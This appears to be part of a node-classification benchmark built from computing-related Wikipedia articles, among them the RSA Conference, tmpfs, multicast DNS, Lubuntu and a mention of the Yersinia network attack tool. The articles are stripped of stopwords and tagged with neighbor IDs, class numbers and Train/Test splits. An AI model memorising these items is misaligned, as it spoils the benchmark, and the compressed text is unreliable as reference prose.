RSA_Conference:rsa conference rsa conference series security conferences approximately 45,000 people attend one conferences year founded 1991 small cryptography conference rsa conferences take place united states europe asia united arab emirates year conference also hosts educational professional networking awards programs name rsa refers public-key encryption technology developed rsa data security inc. founded 1982 abbreviation stands rivest shamir adleman inventors technique idea first rsa conference conceived 1991 phone call rsa security ceo jim bidzos executive director electronic privacy information center first conference one panel called des dss standards choice focused attendees adopt dss standard expected challenge rsa security status de facto standard digital signatures event steadily grew 1993 attracted 200 attendees known many years rsa data security conference eventually became rsa conference time conference grew business-oriented older demographic vendors led competitive issues time 1990s european competitors rsa security sometimes could get booth hired people pass flyers rsa conference encouraging attendees visit hotels nearby 1995 conference criticized clipper chip implemented chip would given u.s. government direct access evidence telecommunications devices chip installed conference put posters sink clipper big letters 1997 conference grown 2,500 attendees first european rsa conference took place 2000 started 5 tracks according network world conference focus expanded cryptography broader security conference larger attendance 2005 microsoft ceo bill gates keynote presentation according bidzos purpose conference became kinds things drive standards organize opposition government policies promote rsa name give customers opportunity 2008 conference 17,000 attendees 375 participating security vendors 18 tracks 230 sessions 2010 rsa conference obama administration publicly revealed comprehensive national cybersecurity initiative cnci created 2008 formerly kept secret 2011 california-based security company hbgary withdrew speaking exhibiting rsa conference citing safety concerns company announced plans reveal identities members hacktivist group anonymous received retaliatory threats hacks 2014 8 speakers boycotted rsa conference sponsor rsa security accused adding backdoor products national security agency could monitor users rsa security technology boycott began f-secure chief technology officer mikko hyppönen wanted rsa security apologize whereas company statement allegations true noted rsa conference rsa security company loosely connected discussion year conference focused heavily leaks edward snowden nsa involvement american technology companies first rsa conference asia-pacific introduced 2013 followed inaugural united arab emirates conference two years later 2015 conference added clause exhibitor contracts effectively prohibiting booth babes requiring professional attire exhibitor floor policy implemented response feedback booth babes made conference feel unprofessional fortune magazine called widespread practice booth babes professional conferences outdated unwelcoming female attendees following year rsa conference focused fbi–apple encryption dispute regarding attempts government gain access iphones containing evidence criminal investigations 2017 conference estimated 40,000–43,000 attendees united states rsa conference international conference series security takes place united states europe asia/japan united arab emirates also provides internet safety education consumers children security scholar program security students operates award programs typically bestowed conferences example one award innovation sandbox contest involves ten startups present technology panel judges 2017 conference u.s. 15 keynotes 700 speakers 500 sessions 550 exhibitors analysis session keywords conference suggest early conferences focused cryptography commerce topical focus conferences transitioned cloud cybersecurity early 2000s conference theme practice began 1995 additionally typically one two security topics conference organizers pick focus year speaking positions rsa conference highly competitive thousands submissions hundred speaking positions rsa conference provides annual awards recognize outstanding people organizations following areas following awards winners announced opening keynote sessions conference april year recent winners include tim jenkin michael assante professor ran canetti professor rafail ostrovsky admiral michael rogers
[ 8320, 5002, 6282, 2837, 11542, 537, 7449, 9246, 8865, 1573, 3495, 3112, 6439, 11561, 3116, 4016, 2629, 5575, 6347, 7887, 5586, 9688, 5217, 8807, 2154, 8176, 1907, 2678, 1912, 2558 ]
Test
7,900
5
Digital_circuit_multiplication_equipment:digital circuit multiplication equipment digital circuit multiplication equipment dcme type voice compression equipment installed ends long-distance telecommunication link typically link via communications satellite submarine communications cable main characteristics dcme defined itu-t recommendation g.763 dcme consists time-assignment speech interpolation tasi voice interpolation stage form statistical multiplexor applied voiceband signals low rate encoding stage exploits correlation successive voiceband samples individual input channel reduce transmitted bitrate required pcm equivalent quality heavy loading conditions example large number channels show continuous activity due voiceband data group iii facsimile signals voice interpolation may able operate within satisfactory quality range discontinuous signals speech affected competitive clipping initial part activity combat dcme may incorporate dynamic load control range input channels dynamic load control form back busying telephone switch dcme functionality point view telephone switch attached local interface standardised itu-t recommendation q.50
[ 7108, 3165 ]
Test
7,901
4
Yersinia_(computing):yersinia computing yersinia network security/hacking tool unix-like operating systems designed take advantage weakness different network protocols yersinia considered valuable widely used security tool 2017 yersinia still development latest stable version number 0.8.2 available github source code repository attacks following network protocols implemented yersinia rated 59 sectools.org top 125 network security tools
[ 418, 841, 8554, 939, 7983, 2996, 5045, 5492, 6904, 5657, 4956 ]
Test
7,902
2
Electric_Fence:electric fence electric fence efence memory debugger written bruce perens consists library programmers link code override c standard library memory management functions efence triggers program crash memory error occurs debugger used inspect code caused error electric fence intended find two common types programming bugs cases electric fence causes errant program abort immediately via segmentation fault normally two errors would cause heap corruption would manifest much later usually unrelated ways thus electric fence helps programmers find precise location memory programming errors electric fence allocates least two pages often 8kb every allocated buffer modes operation deallocate freed buffers thus electric fence vastly increases memory requirements programs debugged leads recommendation programmers apply electric fence smaller programs possible never leave electric fence linked production code electric fence free software licensed gnu general public license
[ 6568, 814 ]
None
7,903
3
Barrett_Communications:barrett communications barrett communications specialist manufacturer supplier commercial high frequency hf tactical hf high frequency vhf communications equipment head office design manufacturing located perth western australia barrett communications founded 1976 company steadily grew began exporting first commercial hf radios 1987 range expanded include transceivers base portable mobile modems power supplies amplifiers antennas accessories may 2009 barrett communication acquired q-mac electronics increased barrett communications product range include vhf radio systems august 2011 barrett communications received certification joint interoperability test command jitc barrett 2050 hf mobile base station transceiver certification includes conformance mil-std-188-141b well automatic link establishment ale specifications mil-std-188-141b appendix 2012 barrett communications exports 150 countries global dealer network 65 countries company maintains quality assurance system covering design manufacturing approved iso 9001 2008 barrett communications also operates marketing office united kingdom barrett europe limited wholly owned subsidiary barrett communications located whiteley hampshire nvis communications/barrett consulting division north american systems integrator barrett communications usa canada barrett communications designs manufactures range hf communications equipment commercial tactical use range includes transceivers base portable mobile modems power supplies amplifiers antennas accessories barrett ’ range hf communications equipment ranges basic voice communication data email fax gps tracking barrett ’ prc-2090 tactical radio meets mil-std 180g fed-std 1045 mil-std 188-141b ale jitc certifiable as-nzs 4770:200 barrett communications designs manufactures range vhf communications equipment specifically tactical use range known barrett prc-2080 tactical vhf radio system includes vhf 30 88 mhz squad brigade base mobile transceivers rebroadcast units equipment provides digital voice encryption frequency hopping data positional awareness rebroadcast capability
[]
Test
7,904
9
MIT/GNU_Scheme:mit/gnu scheme mit/gnu scheme programming language dialect implementation language scheme type lisp produce native binary files x86 ia-32 x86-64 processor architecture supports standard r7rs mostly free open-source software released gnu general public license gpl first released developers massachusetts institute technology mit 1986 free software even free software foundation gnu gpl existed part gnu project features rich runtime software library powerful source code level debugger native code compiler built-in emacs-like editor named edwin books structure interpretation computer programs structure interpretation classical mechanics include software run mit/gnu scheme edwin built-in emacs-like editor comes mit/gnu scheme edwin normally displays codice_1 data buffer mode line mini-buffer starts emacs mode line gives information like name buffer whether buffer read-only modified unmodified
[ 10752, 2050, 11269, 2056, 2062, 9231, 7184, 2577, 9749, 8728, 4633, 4122, 3618, 5154, 8226, 3119, 2105, 3132, 6717, 8258, 8771, 8262, 5703, 10822, 1613, 9299, 10841, 3674, 3675, 7267, 2660, 8293, 2666, 8304, 5751, 7805, 9345, 2180, 1159, ...
Test
7,905
4
Bare-metal_restore:bare-metal restore bare-metal restore technique field data recovery restoration backed data available form allows one restore computer system bare metal i.e without requirements previously installed software operating system typically backed data includes necessary operating system applications data components rebuild restore backed system entirely separate piece hardware configurations hardware receiving restore needs identical configuration hardware source backup although virtualization techniques careful planning enable bare-metal restore hardware configuration different original disk imaging applications enable bare-metal restores storing copies images entire contents hard disks networked external storage writing images physical disks disk image application include entire operating system bootable live cd network file server contains required application code create restore disk images dd utility linux boot cd used copy file systems disk images disk partitions effect bare-metal backup recovery disk images used input new partition type equal larger size alternatively variety virtualization technologies often represent accessible less efficient representation data original partition ibm vm/370 operating system provides command name ddr disk dump restore bit bit backup hard drive specified media typically tape many choices exist microsoft introduced new backup utility wbadmin windows server 2008 family operating system 2008 built-in support bare-metal recovery users software also recover system hyper-v virtual machine microsoft updated windows recovery environment features windows 8 family operating system set provide built-in support bare-metal recovery microsoft windows server 2012 r2 offers built-in bare-metal-recovery
[ 5504, 2196, 922, 9762, 6692, 3366, 7983, 5041, 9655, 823, 11065, 4154, 11581, 3773, 3800, 6768, 3323, 6396, 1150 ]
Test
7,906
8
TumbleDeck:tumbledeck tumbledeck unofficial open-source desktop client application tumblr first version includes simple functions posting text images videos links chats quotes audio added version 1.1 beta compatible windows operating systems developed .net framework tumbledeck programmed visual basic .net 2008 name came mixing tumblr tumble tweetdeck deck makes tumbledeck
[ 3573, 6797 ]
Test
7,907
6
Tmpfs:tmpfs tmpfs temporary file storage paradigm implemented many unix-like operating systems intended appear mounted file system data stored volatile memory instead persistent storage device similar construction ram disk appears virtual disk drive hosts disk file system everything stored tmpfs temporary sense files directly created non-volatile storage hard drive although swap space used backing store case low memory situations reboot everything tmpfs lost memory used tmpfs grows shrinks accommodate files contains many unix distributions enable use tmpfs default /tmp branch file system shared memory observed df example linux distributions e.g debian ubuntu /tmp normal directory /dev/shm uses tmpfs several independent variants tmpfs concept one earliest developed sun microsystems sunos operating systems like bsds linux provided sunos 4 includes likely earliest implementation tmpfs first appeared sunos 4.0 late 1987 together new orthogonal address space management allowed object memory mapped solaris /tmp directory made tmpfs file system default starting solaris 2.1 released december 1992 output solaris codice_1 command show swap background storage tmpfs volume tmpfs supported linux kernel beginning version 2.4 linux tmpfs previously known shmfs based ramfs code used bootup also uses page cache unlike ramfs supports swapping less-used pages swap space well filesystem size inode limits prevent memory situations defaulting half physical ram half number ram pages respectively 4.2bsd introduced mfs memory-based file system implemented applying existing ffs disk filesystem virtual memory region tmpfs memory filesystem implemented using conventional in-memory data structures order improve performance mfs merged official netbsd source tree september 10 2005 available 4.0 later versions freebsd ported netbsd implementation available 7.0 later versions dragonfly bsd also ported netbsd implementation available 2.5.1 later versions openbsd ported netbsd tmpfs implementation well initially started pedro martelletto improved many others enabled builds december 17 2013 first release openbsd tmpfs included 5.5 openbsd 6.0 disabled tmpfs due lack maintenance
[ 5120, 2564, 6669, 3598, 10257, 9236, 6677, 5142, 8214, 3611, 10272, 9249, 9762, 5158, 52, 7225, 11323, 8772, 1109, 10851, 4708, 1637, 9836, 7789, 8816, 9333, 6263, 9335, 9343, 8837, 7818, 654, 2193, 2194, 2197, 2199, 11419, 6309, 1190, 52...
Test
7,908
5
Multicast_DNS:multicast dns computer networking multicast dns mdns protocol resolves hostnames ip addresses within small networks include local name server zero-configuration service using essentially programming interfaces packet formats operating semantics unicast domain name system dns although stuart cheshire designed mdns stand-alone protocol work concert standard dns servers mdns protocol published uses ip multicast user datagram protocol udp packets implemented apple bonjour open source avahi software packages android contains mdns implementation mdns also implemented windows 10 initially limited discovering networked printers later becoming capable resolving hostnames well mdns work conjunction dns service discovery dns-sd companion zero-configuration technique specified separately rfc 6763 mdns client needs resolve hostname sends ip multicast query message asks host name identify target machine multicasts message includes ip address machines subnet use information update mdns caches host relinquish claim name sending response packet time live ttl equal zero default mdns exclusively resolves hostnames ending codice_1 top-level domain tld cause problems domain includes hosts implement mdns found via conventional unicast dns server resolving conflicts requires network-configuration changes violate zero-configuration goal mdns message multicast udp packet sent following locations payload structure based unicast dns packet format consisting two parts—the header data header identical found unicast dns sub-sections data part queries answers authoritative-nameservers additional records number records sub-section matches value corresponding *count field header wire format records query section slightly modified unicast dns adding one single-bit field unicast dns qname field consists series length/value sub-fields called labels label represents one dot-separated substrings fully qualified domain name fqdn list terminated single null-byte representing root dns unicast-response field used minimize unnecessary broadcasts network bit set responders send directed-unicast response directly inquiring node rather broadcasting response entire network qclass field identical found unicast dns records answers authoritative-nameservers additional records sections format collectively known resource records rr resource records mdns also slightly modified general format unicast dns cache-flush bit used instruct neighbor-nodes record overwrite rather appended onto existing cached entries rrname rrtype formats rdata fields found unicast dns however dns service discovery dns-sd common use-case mdns specifies slight modifications formats notably txt records trying codice_2 codice_3 host would cause mdns client computer multicast following udp packet appletv.local host would respond multicasting mdns response packet example header non-zero fields codice_4 word 84 00 codice_5 word 00 01 codice_6 word 00 02 data begin fqdn hex 07 61 70 70 6c 65 74 76 05 6c 6f 63 61 6c 00 appletv.local followed host dns information
[ 8386, 1411, 2887, 4457, 3018, 238, 8238, 11246, 6993, 11250, 7411, 5653, 11413, 5469, 5470, 11647 ]
Train
7,909
0
Optical_braille_recognition:optical braille recognition optical braille recognition act capturing processing images braille characters natural language characters used convert braille documents people read text preservation reproduction documents 1984 group researchers delft university technology designed braille reading tablet reading head photosensitive cells moved along set rulers capture braille text line-by-line 1988 group french researchers lille university science technology developed algorithm called lectobraille converted braille documents plain text system photographed braille text low-resolution ccd camera used spatial filtering techniques median filtering erosion dilation extract braille braille characters converted natural language using adaptive recognition lectobraille technique error rate 1 took average processing time seven seconds per line 1993 group researchers katholieke universiteit leuven developed system recognize braille scanned commercially available scanner system however unable handle deformities braille grid well-formed braille documents required 1999 group hong kong polytechnic university implemented optical braille recognition technique using edge detection translate braille english chinese text 2001 murray dais created handheld recognition system scanned small sections document small area scanned grid deformation less issue simpler efficient algorithm employed 2003 morgavi morando designed system recognize braille characters using artificial neural networks system noted ability handle image degradation successfully approaches optical braille recognition used digitize reproduce texts produced non-computerized systems braille typewriters digitizing braille texts also helps reduce storage space braille texts take much space natural language counterparts optical braille recognition also useful people read braille need access content braille documents many challenges successfully processing braille text arise nature braille documents braille generally printed solid-color paper ink produce contrast raised characters background paper however imperfections page appear scan image page many documents printed inter-point meaning double-sided depressions braille one side appear interlaid protruding braille side optical braille recognition techniques attempt use oblique lighting camera reveal shadows depressions protrusions braille others make use commercially available document scanners
[ 5857 ]
None
7,910
0
Semantic_folding:semantic folding semantic folding theory describes procedure encoding semantics natural language text semantically grounded binary representation approach provides framework modelling language data processed neocortex semantic folding theory draws inspiration douglas r. hofstadter analogy core cognition suggests brain makes sense world identifying applying analogies theory hypothesises semantic data must therefore introduced neocortex form allow application similarity measure offers solution sparse binary vector employing two-dimensional topographic semantic space distributional reference frame theory builds computational theory human cortex known hierarchical temporal memory htm positions complementary theory representation language semantics particular strength claimed approach resulting binary representation enables complex semantic operations performed simply efficiently basic computational level analogous structure neocortex semantic folding theory posits implementation semantic space two-dimensional grid grid populated context-vectors way place similar context-vectors closer instance using competitive learning principles vector space model presented theory equivalence well known word space model described information retrieval literature given semantic space implemented described word-vector obtained given word employing following algorithm position x semantic map x represents cartesian coordinates result process word-vector containing contexts word appears therefore representative semantics word semantic space seen resulting word-vector also sparse distributed representation sdr format schütze 1993 sahlgreen 2006 properties word-sdrs particular interest respect computational semantics semantic spaces natural language domain aim create representations natural language capable capturing meaning original motivation semantic spaces stems two core challenges natural language vocabulary mismatch fact meaning expressed many ways ambiguity natural language fact term several meanings application semantic spaces natural language processing nlp aims overcoming limitations rule-based model-based approaches operating keyword level main drawback approaches brittleness large manual effort required create either rule-based nlp systems training corpora model learning rule-based machine learning-based models fixed keyword level break vocabulary differs defined rules training material used statistical models research semantic spaces dates back 20 years 1996 two papers published raised lot attention around general idea creating semantic spaces latent semantic analysis microsoft hyperspace analogue language university california however adoption limited large computational effort required construct use semantic spaces breakthrough regard accuracy modelling associative relations words e.g spider-web lighter-cigarette opposed synonymous relations whale-dolphin astronaut-driver achieved explicit semantic analysis esa 2007 esa novel non-machine learning based approach represented words form vectors 100,000 dimensions dimension represents article wikipedia however practical applications approach limited due large number required dimensions vectors recently advances neural networking techniques combination new approaches tensors led host new recent developments word2vec google glove stanford university semantic folding represents novel biologically inspired approach semantic spaces word represented sparse binary vector 16,000 dimensions semantic fingerprint 2d semantic map semantic universe sparse binary representation advantageous terms computational efficiency allow storage large numbers possible patterns topological distribution two-dimensional grid outlined lends bitmap type visualization semantics word text active semantic feature displayed e.g pixel seen images shown representation allows direct visual comparison semantics two linguistic items image 1 clearly demonstrates two disparate terms dog car expected obviously different semantics image 2 shows one meaning contexts jaguar jaguar car overlaps meaning porsche indicating partial similarity meaning contexts jaguar e.g jaguar animal clearly different non-overlapping contexts note also visualization semantic similarity using semantic folding bears strong resemblance fmri images produced research study conducted a.g. huth et al. claimed words grouped brain meaning
[ 3288, 7780, 11206, 9935 ]
Test
7,911
3
Scalar_processor:scalar processor scalar processors represent class computer processors scalar processor processes one data item time typical data items integers floating point numbers scalar processor classified sisd processor single instructions single data flynn taxonomy contrast vector processor single instruction operates simultaneously multiple data items referred simd difference analogous difference scalar vector arithmetic superscalar processor hand executes one instruction clock cycle simultaneously dispatching multiple instructions redundant functional units processor functional unit separate cpu core execution resource within single cpu arithmetic logic unit bit shifter multiplier
[ 7173, 8711, 9739, 2066, 7699, 5655, 10779, 10781, 6181, 8231, 3630, 6705, 7218, 2623, 2113, 7234, 3142, 2638, 1122, 3175, 6247, 6252, 8815, 5237, 630, 8822, 6268, 3197, 7313, 6815, 8352, 5793, 6818, 6821, 7852, 9391, 2224, 2226, 7858, 991...
Test
7,912
2
Flashback_(1992_video_game):flashback 1992 video game flashback released flashback quest identity united states 1992 science fiction cinematic platform game developed delphine software france published u.s. gold united states europe sunsoft japan game directed written/designed partially programmed paul cuisset previously created adventure game future wars flashback initially released amiga 1992 although originally created mega drive/genesis ported ms-dos acorn archimedes super nes 1993 time sega mega drive/genesis version also released cd-rom versions flashback sega cd 3do cd-i ms-dos apple macintosh fm towns released 1994 1995 together cartridge version atari jaguar 1995 2017 game released worldwide sega dreamcast featuring graphic assets cutscenes taken ms-dos version music amiga version updated port nintendo switch titled flashback remastered edition released june 7 2018 north america europe australia flashback remastered edition ported playstation 4 released november 20 2018 north america europe australia originally advertised cd-rom game cartridge game features fully hand-drawn backdrops animation rotoscoped giving movements unusual fluidity similar earlier prince persia capture technique flashback invented independently prince persia used complicated method first tracing video images onto transparencies game commercial critical success listed guinness world records best-selling french game time followed sequel titled fade black 1995 2013 flashback remake vectorcell released pc consoles cinematic platformer flashback features gameplay similar 1989 prince persia delphine another world released 1991 level spans large number non-scrolling screens nearly feature multiple levels altitude – requiring player character conrad jump grab onto ledges climb use elevators drop onto lower levels conrad exhibits realistic human running speed jumping ability well realistic weakness – die falls great height conrad also carries pistol unlimited ammunition force shield absorbs certain number shots needing recharging acting conrad health many attacks survive dying portable force field unlimited use act temporary barrier block enemies shots conrad progresses game seven levels increasingly presented spatial puzzles requiring player discover guide toward destination late game conrad receives teleportation device able progress throwing device teleporting otherwise unreachable areas year 2140 amnesiac conrad b. hart chased mutants crash-lands hover bike jungle titan finds holocube fell pocket contains recorded message telling meet friend ian new washington makes way jungle purchases anti-gravity belt order enter new washington via chasm finds ian attacked police kills ian uses regenerator restore conrad memories end year thesis built glasses measure molecular density inadvertently discovered shapeshifting aliens called morphs distinguished high density mixed human population morphs realized investigating targeted anticipating memory erasure recorded holocube sent copy memory ian conrad determined return earth ian tells way afford ticket earth win one death tower game show contestants fight death false papers required pass pay forged papers conrad takes series dangerous jobs city finds continually targeted police presumably misled morph infiltrators conrad wins death tower travels earth false papers get past checkpoint morphs soon realize conrad pursued cops takes taxi paradise club conceals morphs hideout spies three morphs ceiling vent discuss plan conquer earth within hours conrad falls vent taken prison cell soon morphs enter cell kill conrad runs past picks discarded alien gun exploring facility discovers teleporter uses transport morphs home planet finds human prisoner named phillip howard clark opens prison morph appears executes phillip dying phillip gives conrad atomic charge phillip diary reveals planned destroy master brain controls aliens located planet core auxiliary brain must destroyed open communication pathways master brain conrad destroys auxiliary brain finds master brain pathway arrives certain spot hears phillip voice telling atomic charge placed loose platform throws switch awakening brain cause tremor drops charge towards core conrad escapes hangar takes morph spacecraft planet atmosphere detonates navigate home due morphs galaxy human star charts instead puts suspended animation ship drifts space leading events fade black pc version extended introductory sequence minor cut scenes amiga version picking items amiga version user see scenes enabling although seconds delay every time animations load playing game entirely hard drive amiga version also option zoom action whenever conrad opens fire due criticism look removed versions although option play game zoomed remained pc version message conrad writes ending also different release game originally released 3.5 floppy disk ms-dos re-release cd-rom sega cd later adapted pc cd-rom 3do cd-i featured redone pre-rendered cinematic fmvs voice acting sound effects sega cd version also voice work gameplay cd tracks level carried cd-rom conversions jaguar port title screen versions music different cutscenes original releases issue 118 retro gamer paul cussiet told magazine best version mega drive version game created platform north america genesis super nes sega cd versions featured marvel comic book within manual order explain initial story pal releases mega drive super nes versions mega cd version pal region omitted comic instead featured textual prologue super nes port featured minor censorship due nintendo content guidelines time changes included new washington bar becoming cafe death tower renamed cyber tower enemy mutants natural skin colors versions recolored green two-track cd soundtrack released featuring music inspired game directly flashback sold roughly 750,000 copies 1995 computer gaming world approved flashback superbly rotoscoped graphics fluid movement sound card audio criticizing awkward interface use save points magazine concluded excellent game truly creates sense reality electronic gaming monthly praised snes version improved graphics music genesis version remarked flashback slow-paced times retains player interest compelling plot involving puzzles megatech magazine conceded although five big levels finishing game take long nintendo power praised graphics story animation calling almost cinematic noting play control takes getting used electronic gaming monthly commented sega cd version virtually identical genesis version flashback still essential purchase already different version gamepro contrast argued reworked cutscenes look awesome even gamers 've already completed game another platform want play see new cd footage also praised addition cd-quality soundtrack voices reviewer next generation acknowledged sega cd version makes considerable improvements argued standard cartridge-to-sega cd enhancements impact gameplay however lauded flashback graphics animation fiendishly clever puzzles said though game superficially resembles another world heart alien class easily surpasses reviewing jaguar version gamepro noted merely straight port enhancements take advantage hardware game less enjoyable first released game consoles year reviewing macintosh version next generation critic applauded game animation story sequences plot level design longevity next generation reviewed 3do version game stated title still great game 've looking couple years one last note 3do controller n't interfere much game demanding control scheme flashback listed guinness world records best-selling french game time mega drive version became bestseller 1994 mega placed game number eight list top mega drive games time february 2011 wirtualna polska ranked 17th best amiga game polish edition chip ranked tenth best amiga game 2004 readers retro gamer voted flashback 65th top retro game 1994 pc gamer uk named flashback 17th best computer game time editors wrote flashback proves comes producing original stylish challenging games adept french entertainment weekly gave game b wrote finally limping onto sega cd almost two years genesis debut futuristic role-playing thriller still worth checking — n't game since matched unique almost hypnotic dynamic languorous stretches exploration problem-solving punctuated bursts realistic gunplay keep mind atmospheric soundtrack cinematic interludes original genesis flashback advertised cd game cartridge — sega cd flashback version many access delays improves marginally original 'll wonder format complimented sequel titled fade black produced delphine software international 1995 pc playstation 3d game third game series flashback legends development delphine software international adeline software international planned released 2003 cancelled company went bankrupt ceased operations end 2002 early 2013 game titled flashback origins rumoured development french website gameblog stating €300,000 government funding granted cuisset vectorcell 2011 april 11 2013 remake flashback announced reveal trailer reminiscence game engine recreation created gregory montoir cyx engine available amiga os4 dreamcast gp2x iphone linux microsoft windows mac os x maemo morphos nintendo ds wii palm os playstation 2 playstation portable sega saturn windows ce also one xbox 360 magicseb port symbian maemo 5 ronen k available
[ 576, 321, 9732, 10316, 6797, 9166, 10862, 823, 921 ]
Test
7,913
2
Lubuntu:lubuntu lubuntu lightweight linux distribution based ubuntu using lxqt desktop environment place ubuntu gnome desktop lubuntu originally touted lighter less resource hungry energy-efficient aims functional yet modular distribution focused getting way letting users use computer lubuntu originally used lxde desktop moved lxqt desktop release lubuntu 18.10 october 2018 name lubuntu portmanteau lxqt ubuntu lxqt name derives merger lxde razor-qt projects word ubuntu means humanity towards others zulu xhosa languages lubuntu received official recognition formal member ubuntu family 11 may 2011 commencing lubuntu 11.10 released 13 october 2011 lxde desktop first made available ubuntu october 2008 release ubuntu 8.10 intrepid ibex early versions lubuntu including 8.10 9.04 9.10 available separate iso image downloads could installed ubuntu separate lubuntu-desktop packages ubuntu repositories lxde also retroactively installed earlier ubuntu versions february 2009 mark shuttleworth invited lxde project become self-maintained project within ubuntu community aim leading dedicated new official ubuntu derivative called lubuntu march 2009 lubuntu project started launchpad mario behling including early project logo project also established official ubuntu wiki project page includes listings applications packages components august 2009 first test iso released live cd installation option initial testing september 2009 linux magazine reviewer christopher smart showed lubuntu ram usage half xubuntu ubuntu normal installation desktop use two thirds less live cd use 2014 project announced gtk+-based lxde qt-based razor-qt would merging new qt-based lxqt desktop lubuntu would consequently moving lxqt transition complete release lubuntu 18.10 october 2018 first regular release employ lxqt desktop lenny became lubuntu mascot 2014 2018 transition becoming lxqt-based aim lubuntu re-thought development team previously intended users older computers typically ten years old newer introduction windows vista pcs older computers gained faster processors much ram 2018 ten-year-old computers remained much capable case five years earlier result lubuntu development team simon quigley decided change focus emphasize well-documented distribution based lxqt give users functional yet modular experience lightweight default available language developers also decided stop recommending minimum system requirements 18.04 lts release developer simon quigley announced august 2018 lubuntu 20.10 switch wayland display server protocol default january 2019 developers formed lubuntu council new body formalize previous organization written constitution 30 december 2009 first alpha 1 preview version iso lubuntu 10.04 lucid lynx made available testing alpha 2 following 24 january 2010 first beta released 20 march 2010 stable version lubuntu 10.04 released 2 may 2010 four days behind main ubuntu release date 28 april 2010 lubuntu 10.04 released 32-bit iso file users could install 64-bit version 64-bit mini iso install required packages lubuntu 10.04 intended long-term support lts release unlike ubuntu 10.04 lucid lynx going supported 18 months however since infrastructure ubuntu 10.10 maverick meerkat thus lubuntu 10.10 dropped support i586 processors including via c3 amd k6 amd geode/national semiconductor cpus release lubuntu 10.10 prompted community extend support april 2013 lubuntu 10.04 long term support version reviewing lubuntu 10.04 alpha 1 january 2010 joey sneddon omg ubuntu wrote many preconceptions regarding lxde/lubuntu found presently surprised pleasant look pleasant use although doubt would switch gnome lxde give excellent performance would benefit writing final 10.10 release 10 october 2010 sneddon termed nimble easy-to-use desktop writing lubuntu 10.04 may 2010 damien oh make tech easier said looking lightweight alternative install old pc netbook lubuntu great choice ’ get eye candy special graphical effects get fast speed low cost ’ time put old pc back work also reviewing lubuntu 10.04 may 2010 robin catling full circle magazine said first thing impresses running lubuntu modest compaq evo laptop pentium-m 512 mb ram small memory footprint ... beats karmic gnome xubuntu xfce mile evo used take 60 seconds-plus boot desktop lxde takes exactly 30 yet 're restricted gtk2 applications well supported synaptic hooks ubuntu repositories package management pull open office replace default abi-word without crippling machine catling note file manager pcmanfm file manager needs little maturity compete thunar competent robust application n't hog resources like nautilus dolphin june 2010 jim lynch reviewed lubuntu 10.04 saying one thing ’ notice using lubuntu desktop ’ fast fast even underpowered machine lubuntu perform well ’ one best things distro leaves behind bloated eye candy sometimes bog gnome kde ... ’ run noticeable problems lubuntu fast stable ’ see noticeable bugs problems hate happens since ’ much interesting readers run one nasty problem another hopefully next version lubuntu chock full horrendous problems bugs kidding september 2010 lead developer julien lavergne announced lubuntu project granted official status derivative ubuntu part ubuntu 10.04 release cycle work would continue goal ubuntu 10.10 lavergne explained reasons still resource problem canonical /ubuntu infrastructure resolved cycle also writing real process integrate new member ubuntu family ’ still finished lubuntu 10.10 released schedule 10 october 2010 day ubuntu 10.10 maverick meerkat built underlying infrastructure ubuntu 10.10 developer julien lavergne said lubuntu actually part ubuntu family build current ubuntu infrastructure release considered « stable beta » result could final stable release included ubuntu family version 10.10 introduced new artwork distribution including new panel menu backgrounds new openbox theme new lubuntu menu logo splash images desktop wallpaper lubuntu 10.10 accepted official ubuntu derivative release point due lack integration infrastructure canonical ubuntu work continuing towards goal lubuntu 10.10 released 32-bit iso file users could install 64-bit version 64-bit mini iso install required packages developer julien lavergne wrote 10.10 incorporated many changes 10.04 changes considered improvements improvements included new theme designed rafael laguna incorporation xpad note taking ace-of-penguins games lxtask lxde task manager place xfce application replacing epdfview pdf reader evince due memory leak problem removing pyneighborhood minuses included last-minute rewrite installer integrate properly resulted installation instability raising minimum installation ram 180 mb 256 mb issue incorporation ubuntu update manager increased ram usage 10 mb lubuntu 10.04 indication updates available deemed necessary minimum system requirements lubuntu 10.10 described mario behling comparable pentium ii celeron systems 128 mb ram configuration may yield slow yet usable system lubuntu chief developer julien lavergne stated minimum ram install lubuntu 10.10 256 mb reviewing lubuntu 10.10 right release october 2010 jim lynch eye linux said lubuntu ’ biggest appeal speed ’ disappointment area applications load open quickly overall experience lubuntu quite positive detected stability problems lubuntu 10.10 quite solid reliable entire time used lynch fault choice synaptic package manager one strange things lubuntu offers synaptic package manager xubuntu 10.10 hand offers ubuntu software center well synaptic ’ sure ubuntu software center missing lubuntu would make lot sense include since much easier attractive way manage software synaptic gets job done ’ less friendly new users ’ match ubuntu software center terms usability comfort mid-december 2010 lubuntu risen 11th place distrowatch six month list popular linux distributions 319 distributions right behind puppy linux well ahead xubuntu 36th place reviewing linux distribution rankings distrowatch early january 2011 year 2010 versus 2009 ladislav bodnár noted looking tables interesting thing rise distributions use lightweight full-featured lxde desktop openbox window manager example lubuntu comfortably beats kubuntu terms page hits ... project announced development schedule november 2010 lubuntu 11.04 released time 28 april 2011 lubuntu 11.04 released 32-bit iso file users could install 64-bit version 64-bit mini iso install required packages unofficial 64-bit iso 11.04 also released kendall weaver peppermint os improvements lubuntu 11.04 included replacing aqualung audacious default music player elimination hardware abstraction layer introducing movable desktop icons ubuntu font used default improved menu translations reorganized menus release also introduced new default theme artwork designed raphael laguna known ozone partly based xubuntu ’ default bluebird theme lubuntu 11.04 run little 128 mb ram requires 256 mb ram install using graphical installer lubuntu 11.04 completed process official status member ubuntu family mario behling stated next goals project clear apart constantly improving distribution lubuntu project aims become official flavour ubuntu mark shuttleworth remarked lubuntu developers upon release 11.04 reviewing lubuntu 11.04 release joey sneddon omg ubuntu commented look lubuntu ’ 'traditional interface comfort agitated interface revolution heralded gnome 3 ubuntu unity certainly ’ appeal 'bling fans ’ say attention ’ paid appearance new default theme raphael laguna use ubuntu font helps give sometimes-basic-feeling os distinctly professional look subject official status sneddon said lubuntu long sought official sanction ubuntu project family classed official 'derivative ubuntu earning place alongside kubuntu xubuntu accomplished release lubuntu 11.04 hold acceptance remains disappointing expected review 12 may 2011 jim lynch desktop linux reviews faulted 11.04 using ubuntu software center lack alternative wallpapers use abiword place libreoffice praise lubuntu saying speed one nice things lubuntu even slow older system ’ usually quite fast ’ amazing achieve cut unnecessary eye-candy bloat also 12 may 2011 koen vervloesem writing linux user developer criticized applications bundled lubuntu saying software choices rather odd however instance chromium default web browser sensible move distro aimed low-end computers developers also ship firefox lubuntu shows web browsers internet menu also default screenshot program scrot command-line program shown accessories menu everyone find another odd choice install applications synaptic default lubuntu ’ ubuntu software center preferred software installation program ubuntu good releases minor inconveniences though since get access full ubuntu software repositories meaning install favourite applications blink eye one month release lubuntu 11.04 